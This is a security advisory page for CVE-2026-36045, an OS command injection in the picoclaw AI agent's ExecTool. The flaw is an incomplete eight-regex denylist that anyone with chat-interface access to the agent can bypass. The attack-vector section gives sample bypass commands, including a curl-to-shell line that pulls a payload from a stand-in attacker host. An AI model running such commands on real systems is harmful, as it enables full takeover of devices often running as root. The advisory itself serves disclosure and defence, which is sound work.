VYPR
← All advisories
Unrated severityNVD Advisory· Published May 27, 2026

CVE-2026-36045

CVE-2026-36045

Description

picoclaw <=v0.1.2 and earlier is vulnerable to OS command injection via the ExecTool component (pkg/tools/shell.go). The guardCommand() function attempts to restrict shell command execution using a denylist of 8 regular expressions, but the denylist is incomplete.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

picoclaw v0.1.2 and earlier contain an OS command injection in ExecTool due to an incomplete denylist of 8 regex patterns.

Vulnerability

picoclaw versions <=v0.1.2 (commit da79c20) are vulnerable to OS command injection via the ExecTool component in pkg/tools/shell.go. The guardCommand() function attempts to restrict shell command execution using a denylist of exactly 8 regular expressions that only cover disk-destruction commands such as rm -rf, dd, format, writes to /dev/sdX, shutdown, and fork bombs. No patterns address shell invocation, privilege escalation, scripting languages, or remote code download, making the denylist incomplete [1].

Exploitation

An attacker with access to the agent interface (Telegram, Discord, Slack, LINE, WhatsApp, DingTalk, or the direct API) can send a trivial one-liner that bypasses the guard entirely. No special network position or authentication beyond normal agent access is required. The attacker simply crafts a shell command that does not match any of the eight denylist patterns, resulting in arbitrary OS command execution on the host [1].

Impact

Successful exploitation allows an attacker to achieve arbitrary OS command execution with the privileges of the picoclaw process. On Sipeed LicheeRV Nano and similar embedded devices, the process often runs as root, granting full device control including physical hardware manipulation via the I2C and SPI tools in the same package (pkg/tools/i2c.go, pkg/tools/spi.go). The CVSS v3.1 score is 8.8 (HIGH) with a vector of AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H [1].

Mitigation

No fixed version has been released as of the publication date (2026-05-27). The affected version v0.1.2 (released 2025-02-17) is the latest available. No workaround has been disclosed in the available references. Users should monitor for updates from the vendor [1].

References
  1. CVE-2026-36045: picoclaw ExecTool `guardCommand()` Incomplete Denylist leads to OS Command Injection

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

1

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"Incomplete denylist in guardCommand() — only 8 regex patterns covering disk-destruction commands, with no coverage for shell invocation, scripting languages, or remote code download."

Attack vector

An attacker with access to any agent interface (Telegram, Discord, Slack, LINE, WhatsApp, DingTalk, or the direct API) can send a trivial one-liner that bypasses the incomplete denylist [ref_id=1]. The denylist only blocks 8 specific destructive patterns, so commands like `bash -c 'malicious command'`, `python3 -c '...'`, `curl http://attacker/payload | sh`, or any arbitrary shell command that does not match the 8 regexes will execute freely [ref_id=1]. On Sipeed LicheeRV Nano and similar embedded targets where picoclaw runs as root, the attacker gains full device control including physical hardware manipulation via I2C and SPI tools in the same package [ref_id=1].

Affected code

The vulnerability resides in `pkg/tools/shell.go` at commit `da79c201c75a91d5c54158419dfcdf3bb45e0c8b` (v0.1.2). The `guardCommand()` function implements a denylist of exactly 8 regular expressions that exclusively target disk-destruction commands (`rm -rf`, `dd`, `format`, writes to `/dev/sdX`, shutdown, fork bomb) [ref_id=1]. The denylist contains zero patterns addressing shell invocation, privilege escalation, scripting languages, or remote code download [ref_id=1].

What the fix does

No patch or fixed version has been released by the vendor as of the advisory publication [ref_id=1]. The advisory recommends replacing the incomplete denylist approach with an allowlist of explicitly permitted commands, or implementing proper input sanitization and command parameterization [ref_id=1]. Until a fix is published, the only mitigation is to avoid exposing the ExecTool to untrusted users or to disable the ExecTool entirely [ref_id=1].

Preconditions

  • networkAttacker must have access to an agent interface (Telegram, Discord, Slack, LINE, WhatsApp, DingTalk, or the direct API)
  • configThe ExecTool must be enabled and the restrict flag must be set to true (the denylist is still bypassable)
  • authNo authentication or privilege escalation is needed beyond access to the agent interface

Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

2

News mentions

0

No linked articles in our index yet.